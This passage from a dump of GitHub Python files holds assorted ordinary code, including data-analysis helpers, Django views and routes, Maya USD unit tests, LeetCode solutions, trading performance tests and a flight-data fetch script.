fish_bouts[\"bout_start\"].groupby(fish_bouts[\"bout_start\"].dt.hour).count().plot(kind=\"bar\")\n fish_bouts.loc[fish_bouts['FishID'] == fish, \"bout_start\"].groupby(fish_bouts[\"bout_start\"].dt.hour).count().plot(kind=\"bar\")\n\n return fish_bouts\n\n\ndef names_bouts():\n data_names = ['spd_mean', 'move_mean', 'rest_mean', 'y_mean', 'spd_std', 'move_std', 'rest_std', 'y_std',\n 'move_bout_mean', 'nonmove_bout_mean', 'rest_bout_mean', 'nonrest_bout_mean', 'move_bout_std',\n 'nonmove_bout_std', 'rest_bout_std', 'nonrest_bout_std']\n time_v2_m_names = ['predawn', 'dawn', 'day', 'dusk', 'postdusk', 'night']\n\n spd_means = ['spd_mean_predawn', 'spd_mean_dawn', 'spd_mean_day', 'spd_mean_dusk', 'spd_mean_postdusk',\n 'spd_mean_night']\n rest_means = ['rest_mean_predawn', 'rest_mean_dawn', 'rest_mean_day', 'rest_mean_dusk', 'rest_mean_postdusk',\n 'rest_mean_night']\n move_means = ['move_mean_predawn', 'move_mean_dawn', 'move_mean_day', 'move_mean_dusk', 'move_mean_postdusk',\n 'move_mean_night']\n rest_b_means = ['rest_bout_mean_predawn', 'rest_bout_mean_dawn', 'rest_bout_mean_day', 'rest_bout_mean_dusk',\n 'rest_bout_mean_postdusk', 'rest_bout_mean_night']\n nonrest_b_means = ['nonrest_bout_mean_predawn', 'nonrest_bout_mean_dawn', 'nonrest_bout_mean_day',\n 'nonrest_bout_mean_dusk',\n 'nonrest_bout_mean_postdusk', 'nonrest_bout_mean_night']\n move_b_means = ['move_bout_mean_predawn', 'move_bout_mean_dawn', 'move_bout_mean_day', 'move_bout_mean_dusk',\n 'move_bout_mean_postdusk', 'move_bout_mean_night']\n nonmove_b_means = ['nonmove_bout_mean_predawn', 'nonmove_bout_mean_dawn', 'nonmove_bout_mean_day',\n 'nonmove_bout_mean_dusk',\n 'nonmove_bout_mean_postdusk', 'nonmove_bout_mean_night']\n\n # movement_bouts = ['move_bout_mean', 'nonmove_bout_mean', 'move_bout_std']\n # rest_bouts = ['rest_bout_mean', 'nonrest_bout_mean']\n\n return data_names, time_v2_m_names, spd_means, rest_means, move_means, rest_b_means, nonrest_b_means, move_b_means, nonmove_b_means\n\n\nif __name__ == \"__main__\":\n import doctest\n doctest.testmod()\n","repo_name":"annnic/cichlid-analysis","sub_path":"cichlidanalysis/analysis/bouts.py","file_name":"bouts.py","file_ext":"py","file_size_in_byte":14474,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"71202604488","text":"from django.urls import path\nfrom . 
import views\n\nurlpatterns = [\n path('', views.index, name=\"index\"),\n path('about/', views.about, name='about'),\n path('property/', views.proPerty, name=\"property\"),\n path('property_single', views.property, name=\"propertySingle\"),\n path('agents/', views.agent, name=\"agents\"),\n path('agents_single/', views.agentSingle, name=\"agentSinge\"),\n path('blog/', views.blog, name=\"blog\"),\n path('blog_single/', views.blogSingle, name=\"blogSingle\"),\n path('contact/', views.contact, name=\"contact\"),\n]","repo_name":"koueAnicet/immobilier","sub_path":"main/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"13820552981","text":"liczby = []\n\nwhile len(liczby) != 10:\n wpis = input(f'Podaj liczbe numer {len(liczby)+1}: ')\n if wpis == 'koniec':\n break\n else:\n liczby.append(float(wpis))\n\nprint(f'Srednia wartosc liczb to: {sum(liczby)/len(liczby)}')","repo_name":"konradmaleckipl/python_bootcamp_20180825","sub_path":"zjazd2/zad2.py","file_name":"zad2.py","file_ext":"py","file_size_in_byte":242,"program_lang":"python","lang":"pl","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"37115490394","text":"from matplotlib.ticker import PercentFormatter\r\nimport matplotlib.pyplot as plt\r\nimport statsmodels . api as sm\r\nimport pandas as pd\r\nimport os\r\nimport numpy as np\r\ndef plotbar(P,string):\r\n for e in P:\r\n plt.bar(e[0],e[1])\r\n plt.xticks(rotation=90)\r\n plt.savefig(\"TEST\"+string+\".png\")\r\n\r\ndef plotCAPM(Stocks,Market,OLSResult,Subset,String):\r\n cwd = os.getcwd()\r\n folder = cwd + \"/img/testCAPM/\"\r\n\r\n if not os.path.exists(folder):\r\n os.mkdir(folder)\r\n myint=iter(Subset.columns)\r\n for e,OLSRes in zip(Stocks,OLSResult):\r\n str=next(myint).strip()\r\n plt.figure()\r\n plt.plot(Market, OLSRes.iloc[1][0]*Market+OLSRes.iloc[0][1])\r\n plt.scatter(Market,e)\r\n plt . xlabel ('Eurostoxx')\r\n plt . ylabel (str)\r\n plt.savefig(\"img/testCAPM/CAPM-\"+str+String+\".png\")\r\n plt.close()\r\n\r\n\r\ndef plotscatter(setx,sety,title,xlabel,ylabel,sigla,Subset,string_to_save):\r\n cwd = os.getcwd()\r\n folder = cwd + \"/\"+string_to_save\r\n\r\n if not os.path.exists(folder):\r\n os.mkdir(folder)\r\n \r\n myint=iter(Subset.columns)\r\n for e in sety:\r\n str=next(myint)\r\n plt.figure()\r\n plt.scatter(setx,e)\r\n plt.title(title)\r\n plt . xlabel (xlabel)\r\n plt . ylabel (str+ylabel)\r\n plt.savefig(folder+\"/\"+sigla+\"-\"+str+\".png\")\r\n plt.close()\r\n \r\n\r\n\r\ndef OLS(Stock_Risk_Free,Market,printSummary=False):\r\n Res= []\r\n X = np . column_stack (( np . ones_like ( Market ) , Market ))\r\n try:\r\n Stock_Risk_Free.shape[1]\r\n for e,i in zip(Stock_Risk_Free,range(0,len(Stock_Risk_Free))):\r\n df = sm . OLS ( e[1:] , X[1:] ). fit ()\r\n Res.append(pd.read_html(df.summary().tables[1].as_html(),header=0,index_col=0)[0])\r\n if printSummary:\r\n with open('summary'+str(i)+'.txt', 'w') as fh:\r\n fh.write(df.summary().as_html())\r\n except:\r\n Res.append(pd.read_html(sm . OLS ( Stock_Risk_Free[1:], X[1:] ). 
fit ().summary().tables[1].as_html(),header=0,index_col=0)[0])\r\n \r\n \r\n return Res\r\n\r\ndef ReorderByOLSParam(Stocks,Subset,Row_interess,Coloum_interess):\r\n \"\"\"\r\n Function return stock reorder by OLS result\r\n Row_interess -> choose row of OLS Summary between\r\n Const=0, X1=1\r\n\r\n Coloum_interess-> choose coloum of OLS summary between\r\n coef=0 std err=1 t=2 P>|t|=3 0.025=4 0.975=5 \r\n \"\"\" \r\n P = {}\r\n myint=iter(Subset.columns)\r\n for e in Stocks:\r\n P[next(myint)]=e.iloc[Row_interess][Coloum_interess]\r\n return sorted(P.items(), key=lambda x:x[1])\r\n","repo_name":"RiccardoForni/Regression_Project","sub_path":"Project - Mazzolin, Forni, Dian, Lavarello/Regre_Function.py","file_name":"Regre_Function.py","file_ext":"py","file_size_in_byte":2644,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"34331953708","text":"import fixturesUtils\nimport mayaUtils\nimport testUtils\nimport ufeUtils\n\nfrom maya import cmds\nfrom maya import standalone\n\nimport ufe\n\nimport os\nimport unittest\n\nclass SceneSegmentTestCase(unittest.TestCase):\n '''Verify the Scene Segment UFE interface, for multiple runtimes.\n \n UFE Feature : ProxyShape, stage nesting\n Maya Feature : ProxyShape\n Action : query scene segments\n '''\n\n pluginsLoaded = False\n \n @classmethod\n def setUpClass(cls):\n fixturesUtils.readOnlySetUpClass(__file__, loadPlugin=False)\n\n if not cls.pluginsLoaded:\n cls.pluginsLoaded = mayaUtils.isMayaUsdPluginLoaded()\n\n @classmethod\n def tearDownClass(cls):\n standalone.uninitialize()\n\n def setUp(self):\n ''' Called initially to set up the maya test environment '''\n # Load plugins\n self.assertTrue(self.pluginsLoaded)\n\n # load the file and get ready to test!\n cmds.file(force=True, new=True)\n mayaUtils.loadPlugin(\"mayaUsdPlugin\")\n testFile = testUtils.getTestScene(\"camera\", 'TranslateRotate_vs_xform.usda')\n mayaUtils.createProxyFromFile(testFile)\n globalSelection = ufe.GlobalSelection.get()\n globalSelection.clear()\n\n def testProxyShapeSceneSegmentHandler(self):\n proxyShapePath = ufe.PathString.path('|stage|stageShape')\n proxyShapeParentPath = ufe.PathString.path('|stage')\n camerasParentPath = ufe.PathString.path('|stage|stageShape,/cameras')\n\n # searching on a gateway item should give all gateway nodes in the child segment.\n # USD doesn't have any gateway nodes, so the result should be empty\n handler = ufe.RunTimeMgr.instance().sceneSegmentHandler(proxyShapePath.runTimeId())\n result = handler.findGatewayItems(proxyShapePath)\n self.assertTrue(result.empty())\n\n # searching the the parent of a gateway item searches the Maya scene segment\n # for gateway nodes without recursing into USD. 
should be the proxy shape\n handler = ufe.RunTimeMgr.instance().sceneSegmentHandler(proxyShapeParentPath.runTimeId())\n result = handler.findGatewayItems(proxyShapeParentPath)\n self.assertTrue(result.contains(proxyShapePath))\n self.assertEqual(len(result), 1)\n\n # searching for the USD parent of both cameras should find no scene segment handler\n handler = ufe.RunTimeMgr.instance().sceneSegmentHandler(camerasParentPath.runTimeId())\n self.assertEqual(handler, None)\n\n @unittest.skipUnless(ufeUtils.ufeFeatureSetVersion() >= 4, 'Test for UFE v4 or later')\n def testFilteredFindGatewayItems(self):\n proxyShapePath = ufe.PathString.path('|stage|stageShape')\n proxyShapeParentPath = ufe.PathString.path('|stage')\n\n # Searching on a gateway item should give all gateway nodes in\n # the child segment. USD doesn't have any gateway nodes, so the\n # result should be empty. When using the filtered version of\n # `findGatewayItems()`, the result should still be empty.\n # Filtering can never increase the cardinality of the result.\n handler = ufe.RunTimeMgr.instance().sceneSegmentHandler(proxyShapePath.runTimeId())\n \n result = handler.findGatewayItems(proxyShapePath)\n self.assertTrue(result.empty())\n\n usdRunTimeId = ufe.RunTimeMgr.instance().getId('USD')\n result = handler.findGatewayItems(proxyShapePath, usdRunTimeId)\n self.assertTrue(result.empty())\n\n otherRunTimeId = 6174\n result = handler.findGatewayItems(proxyShapePath, otherRunTimeId)\n self.assertTrue(result.empty())\n\n # Searching from the parent of a gateway item searches the Maya\n # scene segment for gateway nodes without recursing into USD.\n # If no filter is specified or if the USD runtime ID is used as\n # a filter, this should return the proxy shape. If a different\n # runtime ID is used as a filter, the result should be empty.\n handler = ufe.RunTimeMgr.instance().sceneSegmentHandler(proxyShapeParentPath.runTimeId())\n \n result = handler.findGatewayItems(proxyShapeParentPath)\n self.assertTrue(result.contains(proxyShapePath))\n self.assertEqual(len(result), 1)\n\n result = handler.findGatewayItems(proxyShapeParentPath, usdRunTimeId)\n self.assertTrue(result.contains(proxyShapePath))\n self.assertTrue(len(result), 1)\n\n result = handler.findGatewayItems(proxyShapeParentPath, otherRunTimeId)\n self.assertTrue(result.empty())\n\nif __name__ == '__main__':\n unittest.main(verbosity=2)\n","repo_name":"Autodesk/maya-usd","sub_path":"test/lib/ufe/testSceneSegment.py","file_name":"testSceneSegment.py","file_ext":"py","file_size_in_byte":4613,"program_lang":"python","lang":"en","doc_type":"code","stars":690,"dataset":"github-code","pt":"16"} +{"seq_id":"39242594256","text":"prompt = (\"\\nPlease state your message\")\nprompt += \"\\n(or enter 'quit' to move on.): \"\n\n# message = \"\"\n# while message != 'quit':\n# message = input(prompt)\n\n# if message != 'quit':\n# print(message)\n\n#using a flag\nactive = True\nwhile active:\n message = input(prompt)\n\n if message == 'quit':\n active = False\n else:\n print(message)\n\n#using break to exit a loop\nprompt = (\"\\nPlease enter food you'd like to order\")\nprompt += \"\\n(or enter 'quit' to end program.): \"\n\nwhile True:\n food = input(prompt)\n\n if food == 'quit':\n break\n else: \n print (f\"We will have your {food.upper()} ready in the next 15 
minutes\")","repo_name":"hanna1cho/python_crash_course","sub_path":"input.py","file_name":"input.py","file_ext":"py","file_size_in_byte":667,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"45102797009","text":"import rospy\nimport actionlib\n\n\ndef motion_test(self, goals, goal_type=0):\n \"\"\"goals =[left arm, right arm]\"\"\"\n service_name = \"execute_all_joint_poses\"\n group_name = 'dual_arm'\n try:\n rospy.wait_for_service(service_name, 1)\n client = rospy.ServiceProxy(service_name, ExecuteAllJointPoses)\n except rospy.ROSException:\n rospy.logwarn('Service ' + service_name + ' not available')\n return None\n req = ExecuteAllJointPosesRequest()\n req.group_name = group_name\n req.goals = ros_utils.to_posearray_msg(goals)\n req.goal_type = goal_type\n resp = client(req)\n if resp.result_status == resp.FAILED:\n rospy.logerr('execute both joint pose failed')\n return False\n return True\n\ndef main():\n\n rospy.init_node(\"nachi_test\")\n arm_grasp.run_ee_sim()\n\n\nif __name__ == \"__main__\":\n main()\n\n","repo_name":"zhengshuai1/robotiqcustom_ws","sub_path":"scripts/utils/srv_test.py","file_name":"srv_test.py","file_ext":"py","file_size_in_byte":860,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"34138868113","text":"#\n# @lc app=leetcode id=236 lang=python3\n#\n# [236] Lowest Common Ancestor of a Binary Tree\n#\n# https://leetcode.com/problems/lowest-common-ancestor-of-a-binary-tree/description/\n#\n# algorithms\n# Medium (42.53%)\n# Likes: 3115\n# Dislikes: 164\n# Total Accepted: 412.6K\n# Total Submissions: 953.4K\n# Testcase Example: '[3,5,1,6,2,0,8,null,null,7,4]\\n5\\n1'\n#\n# Given a binary tree, find the lowest common ancestor (LCA) of two given nodes\n# in the tree.\n# \n# According to the definition of LCA on Wikipedia: “The lowest common ancestor\n# is defined between two nodes p and q as the lowest node in T that has both p\n# and q as descendants (where we allow a node to be a descendant of itself).”\n# \n# Given the following binary tree:  root = [3,5,1,6,2,0,8,null,null,7,4]\n# \n# \n# \n# Example 1:\n# \n# \n# Input: root = [3,5,1,6,2,0,8,null,null,7,4], p = 5, q = 1\n# Output: 3\n# Explanation: The LCA of nodes 5 and 1 is 3.\n# \n# \n# Example 2:\n# \n# \n# Input: root = [3,5,1,6,2,0,8,null,null,7,4], p = 5, q = 4\n# Output: 5\n# Explanation: The LCA of nodes 5 and 4 is 5, since a node can be a descendant\n# of itself according to the LCA definition.\n# \n# \n# \n# \n# Note:\n# \n# \n# All of the nodes' values will be unique.\n# p and q are different and both values will exist in the binary tree.\n# \n# \n#\n\n# @lc code=start\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution:\n def lowestCommonAncestor(self, root: 'TreeNode', p: 'TreeNode', q: 'TreeNode') -> 'TreeNode':\n \"\"\"\n ✔ Your runtime beats 23.52 % of python3 submissions\n ✔ Your memory usage beats 5.55 % of python3 submissions (29.1 MB)\n \"\"\"\n self.preorder = 0\n found = set()\n post = []\n def dfs(node):\n if node:\n self.preorder += 1\n if node is p:\n found.add(node)\n if node is q:\n found.add(node)\n \n node.preorder = self.preorder\n dfs(node.left)\n dfs(node.right)\n node.postorder = len(post) + 1\n post.append(node)\n \n dfs(root)\n \n mn_preorder = [f.preorder for f in found]\n mx_postorder = [f.postorder for f in found]\n \n for node in post:\n if 
node.preorder <= min(mn_preorder) and node.postorder >= max(mx_postorder):\n return node\n\n def lowestCommonAncestor(self, root, p, q):\n \"\"\"\n @ stefan\n ✔ Your runtime beats 6.8 % of python3 submissions\n ✔ Your memory usage beats 5.55 % of python3 submissions (39.1 MB)\n \"\"\"\n if root in (None, p, q): return root\n l, r = (self.lowestCommonAncestor(subtree, p, q) for subtree in (root.left, root.right))\n return root if l and r else l or r\n\n\n def lowestCommonAncestor(self, root, p, q):\n \"\"\"\n official answer\n \"\"\"\n def recur(node):\n if not node: return False\n left = recur(node.left)\n right = recur(node.right)\n mid = node == p or node == q\n if mid + left + right >= 2:\n self.ans = node\n return mid or left or right\n self.ans = None\n recur(root)\n return self.ans\n\n# @lc code=end\n","repo_name":"nickyfoto/lc","sub_path":"python/tests/236_lowest_common_ancestor_of_a_binary_tree.py","file_name":"236_lowest_common_ancestor_of_a_binary_tree.py","file_ext":"py","file_size_in_byte":3411,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"11532204952","text":"from core.models import Role\nfrom .models import AccountUser, PermissionLog\nfrom .serializers import AccountUserSerializers, PermissionLogSerializers, UserSerializer\nfrom rest_framework import viewsets\nfrom django.contrib.auth.models import User\n\n\nclass AccountUserViewSet(viewsets.ModelViewSet):\n serializer_class = AccountUserSerializers\n queryset = AccountUser.objects.all()\n\n def perform_create(self, serializer):\n super().perform_create(serializer)\n\n fields = {\n 'properties': serializer.instance.properties.values_list('id', flat=True),\n }\n try:\n serializer.instance.log_role_change(\n source=PermissionLog.ACCOUNT_USER_CREATED,\n type_of_change=PermissionLog.ROLE_CHANGED,\n new_role=serializer.instance.role\n )\n\n serializer.instance.log_property_change(\n source=PermissionLog.ACCOUNT_USER_CREATED,\n type_of_change=PermissionLog.PROPERTY_CHANGED,\n new_props=list(fields.get('properties')),\n old_props=list()\n )\n except Exception as e:\n # logger.exception(e)\n print(e)\n pass\n\n def perform_update(self, serializer):\n instance = self.get_object()\n\n previous_fields = {\n 'properties': list(instance.properties.values_list('id', flat=True)),\n 'role': getattr(instance.role, \"pk\", None),\n }\n\n super().perform_update(serializer)\n\n previous_property_ids = set(previous_fields['properties'])\n property_ids = set(list(serializer.instance.properties.values_list('id', flat=True)))\n\n fields = {\n 'properties': list(property_ids.symmetric_difference(previous_fields['properties'])),\n 'role': (serializer.instance.role.pk,) if serializer.instance.role.pk != previous_fields['role'] else []\n }\n # logging start here\n instance.log_role_change(\n source=PermissionLog.ACCOUNT_USER_UPDATED,\n type_of_change=PermissionLog.ROLE_CHANGED,\n old_role=instance.role,\n new_role=serializer.instance.role\n )\n\n added_properties = property_ids - previous_property_ids\n removed_properties = previous_property_ids - property_ids\n\n if added_properties or removed_properties:\n instance.log_property_change(\n source=PermissionLog.ACCOUNT_USER_UPDATED,\n type_of_change=PermissionLog.PROPERTY_CHANGED,\n new_props=added_properties,\n old_props=removed_properties\n )\n\n def perform_destroy(self, instance):\n fields = {\n 'properties': instance.properties.values_list('id', flat=True),\n 'role': getattr(instance.role, \"pk\", None)\n }\n 
instance.log_role_change(\n source=PermissionLog.ACCOUNT_USER_DELETED,\n type_of_change=PermissionLog.ROLE_CHANGED,\n old_role=instance.role,\n )\n instance.log_property_change(\n source=PermissionLog.ACCOUNT_USER_DELETED,\n type_of_change=PermissionLog.PROPERTY_CHANGED,\n old_props=list(fields.get('properties')),\n new_props=list()\n )\n super().perform_destroy(instance)\n\n\nclass PermissionLogView(viewsets.ModelViewSet):\n serializer_class = PermissionLogSerializers\n queryset = PermissionLog.objects.all()\n\n\nclass UserViewSet(viewsets.ModelViewSet):\n serializer_class = UserSerializer\n queryset = User.objects.all()\n","repo_name":"cloverananya/13094","sub_path":"manager/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3574,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"21701685393","text":"from nautilus_trader.core.correctness import PyCondition\nfrom nautilus_trader.test_kit.performance import PerformanceHarness\n\n\nclass TestCorrectnessConditionPerformance(PerformanceHarness):\n def test_condition_none(self):\n self.benchmark.pedantic(\n target=PyCondition.none,\n args=(None, \"param\"),\n iterations=100_000,\n rounds=1,\n )\n # ~0.0ms / ~0.1μs / 142ns minimum of 100,000 runs @ 1 iteration each run.\n\n def test_condition_true(self):\n self.benchmark.pedantic(\n target=PyCondition.true,\n args=(True, \"this should be true\"),\n iterations=100_000,\n rounds=1,\n )\n # ~0.0ms / ~0.1μs / 149ns minimum of 100,000 runs @ 1 iteration each run.\n\n # 100000 iterations @ 12ms with boolean except returning False\n # 100000 iterations @ 12ms with void except returning * !\n\n def test_condition_valid_string(self):\n self.benchmark.pedantic(\n target=PyCondition.valid_string,\n args=(\"abc123\", \"string_param\"),\n iterations=100_000,\n rounds=1,\n )\n # ~0.0ms / ~0.2μs / 205ns minimum of 100,000 runs @ 1 iteration each run.\n\n def test_condition_type_or_none(self):\n self.benchmark.pedantic(\n target=PyCondition.type_or_none,\n args=(\"hello\", str, \"world\"),\n iterations=100_000,\n rounds=1,\n )\n # ~0.0ms / ~0.2μs / 224ns minimum of 100,000 runs @ 1 iteration each run.\n","repo_name":"nautechsystems/nautilus_trader","sub_path":"tests/performance_tests/test_perf_correctness.py","file_name":"test_perf_correctness.py","file_ext":"py","file_size_in_byte":1540,"program_lang":"python","lang":"en","doc_type":"code","stars":1199,"dataset":"github-code","pt":"16"} +{"seq_id":"5215328964","text":"#!/usr/bin/env python\n# encoding: utf-8\n\"\"\"\n@author: wushaohong\n@time: 2019-09-26 09:46\n\"\"\"\n\"\"\"给定一个非负整数数组,你最初位于数组的第一个位置。\n\n数组中的每个元素代表你在该位置可以跳跃的最大长度。\n\n你的目标是使用最少的跳跃次数到达数组的最后一个位置。\n\n示例:\n\n输入: [2,3,1,1,4]\n输出: 2\n解释: 跳到最后一个位置的最小跳跃数是 2。\n  从下标为 0 跳到下标为 1 的位置,跳 1 步,然后跳 3 步到达数组的最后一个位置。\n说明:\n\n假设你总是可以到达数组的最后一个位置。\n\n来源:力扣(LeetCode)\n链接:https://leetcode-cn.com/problems/jump-game-ii\n著作权归领扣网络所有。商业转载请联系官方授权,非商业转载请注明出处。\"\"\"\n\n\nclass Solution:\n def jump(self, nums) -> int:\n n = len(nums)\n dp = [float(\"inf\")] * n\n dp[0] = 0\n for i in range(1, len(nums)):\n for j in range(i):\n if nums[j] >= i - j:\n dp[i] = min(dp[i], dp[j] + 1)\n # print(dp)\n return dp[-1]\n\n def jump2(self, nums) -> int:\n # if len(nums) == 1:\n # return 0\n count = 0\n point = 0\n while point < len(nums) and nums[point] < len(nums) - point - 1:\n temp = 0\n p = point\n for i in range(1, nums[p] + 1):\n if nums[p + i]+p+i >= temp:\n temp = nums[p + i]+p+i\n point = p + i\n count += 1\n\n return count + 1\n\n\ndef jump(nums):\n end 
= 0\n maxPosition = 0\n steps = 0\n for i in range(len(nums) - 1):\n # 找能跳的最远的\n maxPosition = max(maxPosition, nums[i] + i)\n if i == end:\n # 遇到边界,就更新边界,并且步数加一\n end = maxPosition\n steps += 1\n return steps\n\n\nif __name__ == '__main__':\n sol = Solution()\n print(sol.jump([2, 3, 1, 1, 4]))\n print(sol.jump2([2, 3, 1, 1, 4]))\n print(jump([2, 3, 1, 1, 4]))\n","repo_name":"hshrimp/letecode_for_me","sub_path":"letecode/1-120/25-48/45.py","file_name":"45.py","file_ext":"py","file_size_in_byte":2077,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"13819264471","text":"\"\"\"Regex, I think.\"\"\"\nimport re\n\n\nclass Entry:\n \"\"\"Entry class.\"\"\"\n\n def __init__(self, first_name: str, last_name: str, id_code: str, phone_number: str, date_of_birth: str,\n address: str):\n \"\"\"Init.\"\"\"\n self.first_name = first_name\n self.last_name = last_name\n self.id_code = id_code\n self.phone_number = phone_number\n self.date_of_birth = date_of_birth\n self.address = address\n\n def format_date(self):\n \"\"\"\n Return the date in the following format: 'Day: {day}, Month: {month}, Year: {year}'.\n\n Just for fun, no points gained or lost from this.\n\n Example: 'Day: 06, Month: 11, Year: 1995'\n If the object doesn't have date of birth given, return None.\n :return:\n \"\"\"\n date = self.date_of_birth\n if date is not None:\n date_list = date.split(\"-\")\n for i in range(len(date_list)):\n if i == 0:\n day = date_list[i]\n elif i == 1:\n month = date_list[i]\n elif i == 2:\n year = date_list[i]\n return f'Day: {day}, Month: {month}, Year: {year}'\n\n def __repr__(self) -> str:\n \"\"\"Object representation.\"\"\"\n return f\"Name: {self.first_name} {self.last_name}\\n\" \\\n f\"ID code: {self.id_code}\\n\" \\\n f\"Phone number: {self.phone_number}\\n\" \\\n f\"Date of birth: {self.format_date()}\\n\" \\\n f\"Address: {self.address}\"\n\n def __eq__(self, other) -> bool:\n \"\"\"\n Compare two entries.\n\n This method is perfect. 
Don't touch it.\n \"\"\"\n return self.first_name == other.first_name \\\n and self.last_name == other.last_name \\\n and self.id_code == other.id_code \\\n and self.phone_number == other.phone_number \\\n and self.date_of_birth == other.date_of_birth \\\n and self.address == other.address\n\n\ndef parse(row: str) -> Entry:\n \"\"\"\n Parse data from input string.\n\n :param row: String representation of the data.\n :return: Entry object with filled values\n \"\"\"\n regex = re.finditer(r\"(^[A-ZÕÜÖÄ]+[a-züõöä]+)?\"\n r\"([A-ZÕÜÖÄ]+[a-züõöä]+(?=\\d))?\"\n r\"([\\d]{11})\"\n r\"((?<=[\\d]{3})\\+[0-9]{3} ?[0-9]{7,8}|(?<=[\\d]{11})[0-9]{7,8})?\"\n r\"(\\d\\d-\\d\\d-\\d\\d\\d\\d)?\"\n r\"([\\w\\D\\d]+)?\", row)\n for match in regex:\n first_name = match.group(1)\n last_name = match.group(2)\n id_code = match.group(3)\n phone_number = match.group(4)\n date_of_birth = match.group(5)\n address = match.group(6)\n entry = Entry(first_name, last_name, id_code, phone_number, date_of_birth, address)\n return entry\n\n\nif __name__ == '__main__':\n print(parse('PriitPann39712047623+372 5688736402-12-1998Oja 18-2,Pärnumaa,Are'))\n \"\"\"\n Name: Priit Pann\n ID code: 39712047623\n Phone number: +372 56887364\n Date of birth: Day: 02, Month: 12, Year: 1998\n Address: Oja 18-2,Pärnumaa,Are\n \"\"\"\n print()\n print(parse('39712047623+372 5688736402-12-1998Oja 18-2,Pärnumaa,Are'))\n \"\"\"\n Name: None None\n ID code: 39712047623\n Phone number: +372 56887364\n Date of birth: Day: 02, Month: 12, Year: 1998\n Address: Oja 18-2,Pärnumaa,Are\n \"\"\"\n print()\n print(parse('PriitPann3971204762302-12-1998Oja 18-2,Pärnumaa,Are'))\n \"\"\"\n Name: Priit Pann\n ID code: 39712047623\n Phone number: None\n Date of birth: Day: 02, Month: 12, Year: 1998\n Address: Oja 18-2,Pärnumaa,Are\n \"\"\"\n print()\n print(parse('PriitPann39712047623+372 56887364Oja 18-2,Pärnumaa,Are'))\n \"\"\"\n Name: Priit Pann\n ID code: 39712047623\n Phone number: +372 56887364\n Date of birth: None\n Address: Oja 18-2,Pärnumaa,Are\n \"\"\"\n print()\n print(parse('PriitPann39712047623+372 5688736402-12-1998'))\n \"\"\"Name: Priit Pann\n ID code: 39712047623\n Phone number: +372 56887364\n Date of birth: Day: 02, Month: 12, Year: 1998\n Address: None\n \"\"\"\n","repo_name":"Krissuper11/Python","sub_path":"EX/ex06_regex/entry.py","file_name":"entry.py","file_ext":"py","file_size_in_byte":4160,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"37861849632","text":"#!/usr/bin/env python3\n# coding: UTF-8\n# Author: David\n# Email: youchen.du@gmail.com\n# Created: 2017-09-15 15:08\n# Last modified: 2017-10-07 17:16\n# Filename: create_fake_db.py\n# Description:\nimport sys\nimport os\nimport django\n\nbase_dir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\nprint(base_dir)\nsys.path.append(base_dir)\nos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"SRPA.settings\")\ndjango.setup()\n\nfrom django.contrib.auth.models import User, Group\nfrom authentication import USER_IDENTITY_STUDENT, USER_IDENTITY_TEACHER\nfrom authentication import INSTITUTES\nfrom authentication.models import StudentInfo, TeacherInfo\nfrom const.models import Site, Workshop\nfrom SiteReservation.models import Reservation\nfrom ProjectApproval.models import Project, SocialInvitation\nfrom tools.utils import assign_perms\n\n\ndef create_student_info(num=10, prefix='student_'):\n students = []\n for i in range(1, 1 + num):\n user = User.objects.create_user(\n username=prefix + str(i),\n 
password=str(i),\n first_name=str(i))\n info = StudentInfo(\n user=user, identity=USER_IDENTITY_STUDENT,\n phone=str(i), student_id=str(i))\n info.save()\n assign_perms('studentinfo', user, info)\n assign_perms('reservation', user, perms='add',\n app_name='SiteReservation')\n assign_perms('project', user, perms='add',\n app_name='ProjectApproval')\n students.append(info)\n return students\n\n\ndef create_teacher_info(num=10, prefix='teacher_'):\n teachers = []\n for i in range(1, 1 + num):\n user = User.objects.create_user(\n username=prefix + str(i),\n password=str(i),\n first_name=str(i))\n info = TeacherInfo(\n user=user, identity=USER_IDENTITY_TEACHER)\n info.save()\n assign_perms('teacherinfo', user, info)\n teachers.append(info)\n return teachers\n\n\ndef create_site(num=10, prefix='site_'):\n for i in range(1, 1 + num):\n site = Site(desc=prefix + str(i))\n site.save()\n\n\ndef create_workshop(num=10, prefix='workshop_'):\n for i in range(1, 1 + num):\n desc = prefix + str(i)\n group, _ = Group.objects.get_or_create(name=desc)\n workshop = Workshop(desc=desc, group=group)\n workshop.save()\n\n\ndef main():\n create_student_info()\n teachers = create_teacher_info()\n create_site()\n create_workshop()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Time1ess/SRPA","sub_path":"scripts/create_fake_db.py","file_name":"create_fake_db.py","file_ext":"py","file_size_in_byte":2506,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"28504431764","text":"import os\nimport sqlite3\nfrom sqlite3.dbapi2 import OperationalError\nimport requests\nimport datetime\n\nAPI_ROOT = 'https://opensky-network.org/api'\n\nos.chdir('D:/Works_Backups/Python/flytech/flytech')\n\nr = requests.get(url=API_ROOT + '/states/all')\ntime = r.json()['time']\nctime = datetime.datetime.fromtimestamp(time).strftime('%Y-%m-%d - %H:%M:%S')\n# states is a two dimensional list\nstates = r.json()['states']\nconn = sqlite3.connect('apadana.sqlite3')\ncur = conn.cursor()\ntry:\n data = cur.execute('SELECT id FROM dflight')\nexcept OperationalError:\n sql = 